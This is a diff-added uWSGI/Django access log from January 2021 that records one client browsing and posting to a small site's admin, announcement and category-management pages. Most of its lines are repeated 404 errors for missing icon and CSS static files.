+[pid: 15176|app: 0|req: 2567/3522] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:43:32 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2568/3523] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:43:32 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2569/3524] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:43:32 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2570/3525] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:43:32 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2571/3526] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:43:32 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3527] 180.160.48.43 () {40 vars in 929 bytes} [Thu Jan 14 13:43:32 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2572/3528] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:43:32 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 15176|app: -1|req: -1/3529] 180.160.48.43 () {40 vars in 851 bytes} [Thu Jan 14 13:43:32 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3530] 180.160.48.43 () {40 vars in 925 bytes} [Thu Jan 14 13:43:32 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 15176|app: -1|req: -1/3531] 180.160.48.43 () {40 vars in 889 bytes} [Thu Jan 14 13:43:32 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+delete
+[pid: 15176|app: 0|req: 2573/3532] 180.160.48.43 () {48 vars in 1022 bytes} [Thu Jan 14 13:43:40 2021] POST /admin-home/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2574/3533] 180.160.48.43 () {40 vars in 928 bytes} [Thu Jan 14 13:43:40 2021] GET /admin-home/ => generated 20786 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2575/3534] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2576/3535] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2577/3536] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2578/3537] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 15176|app: 0|req: 2579/3538] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2580/3539] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2581/3540] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:43:40 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2582/3541] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:43:41 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2583/3542] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:43:41 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+zhiding
+置顶
+[pid: 15176|app: 0|req: 2584/3543] 180.160.48.43 () {48 vars in 1022 bytes} [Thu Jan 14 13:43:45 2021] POST /admin-home/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2585/3544] 180.160.48.43 () {40 vars in 928 bytes} [Thu Jan 14 13:43:45 2021] GET /admin-home/ => generated 20786 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2586/3545] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:43:45 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2587/3546] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:43:45 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2588/3547] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:43:45 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 15176|app: 0|req: 2589/3548] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:45 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2590/3549] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:46 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2591/3550] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:43:46 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2592/3551] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:43:45 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 60 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2593/3552] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:43:46 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2594/3553] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:43:46 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2595/3554] 180.160.48.43 () {40 vars in 932 bytes} [Thu Jan 14 13:43:47 2021] GET /announcement/ => generated 11798 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2596/3555] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2597/3556] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2598/3557] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2599/3558] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2600/3559] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 15176|app: 0|req: 2601/3560] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2602/3561] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:43:47 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2603/3562] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:43:48 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2604/3563] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:43:48 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2606/3564] 180.160.48.43 () {40 vars in 935 bytes} [Thu Jan 14 13:43:59 2021] GET /announcement/? => generated 11798 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2606/3565] 180.160.48.43 () {48 vars in 1029 bytes} [Thu Jan 14 13:43:59 2021] POST /announcement/ => generated 27 bytes in 30 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2607/3566] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:43:59 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2609/3567] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:43:59 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2610/3568] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:43:59 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2611/3569] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:43:59 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 15176|app: 0|req: 2612/3570] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:43:59 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2612/3571] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:43:59 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 45 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2613/3572] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:00 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2614/3573] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:44:00 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2615/3574] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:44:00 2021] GET /static/css/animate.css => generated 3513 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2616/3575] 180.160.48.43 () {40 vars in 935 bytes} [Thu Jan 14 13:44:01 2021] GET /announcement/ => generated 12633 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2617/3576] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:44:01 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2618/3577] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2620/3579] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2621/3580] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 15176|app: 0|req: 2622/3581] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2619/3581] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2623/3582] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2624/3583] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:44:01 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2625/3584] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:44:01 2021] GET /static/css/spinners.css => generated 3516 bytes in 40 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2626/3585] 180.160.48.43 () {48 vars in 1028 bytes} [Thu Jan 14 13:44:07 2021] POST /announcement/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2627/3586] 180.160.48.43 () {40 vars in 934 bytes} [Thu Jan 14 13:44:07 2021] GET /announcement/ => generated 11798 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2628/3587] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2629/3588] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2630/3589] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2631/3590] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 15176|app: 0|req: 2632/3591] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2633/3592] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2634/3593] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:44:07 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2635/3594] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:44:07 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2636/3595] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:44:07 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2637/3596] 180.160.48.43 () {40 vars in 932 bytes} [Thu Jan 14 13:44:08 2021] GET /kind-manage/ => generated 13023 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2638/3597] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2639/3598] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2640/3599] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 15176|app: 0|req: 2641/3600] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 15176|app: 0|req: 2642/3601] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 13:44:08 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2643/3602] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 22 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2644/3603] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 15176|app: 0|req: 2645/3604] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 13:44:08 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 15176|app: 0|req: 2646/3605] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 13:44:09 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2648/3606] 180.160.48.43 () {40 vars in 932 bytes} [Thu Jan 14 13:44:16 2021] GET /kind-manage/? => generated 13965 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 15176|app: 0|req: 2648/3607] 180.160.48.43 () {48 vars in 1025 bytes} [Thu Jan 14 13:44:16 2021] POST /kind-manage/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 15176|app: 0|req: 2649/3608] 180.160.48.43 () {40 vars in 931 bytes} [Thu Jan 14 13:44:16 2021] GET /kind-manage/ => generated 13965 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 15176|app: 0|req: 2650/3609] 180.160.48.43 () {38 vars in 884 bytes} [Thu Jan 14 13:44:16 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 15176|app: 0|req: 2651/3610] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 13:44:16 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 15176|app: 0|req: 2652/3611] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 13:44:16 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 15176|app: 0|req: 2653/3612] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 13:44:16 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 15176|app: 0|req: 2654/3613] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 13:44:16 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
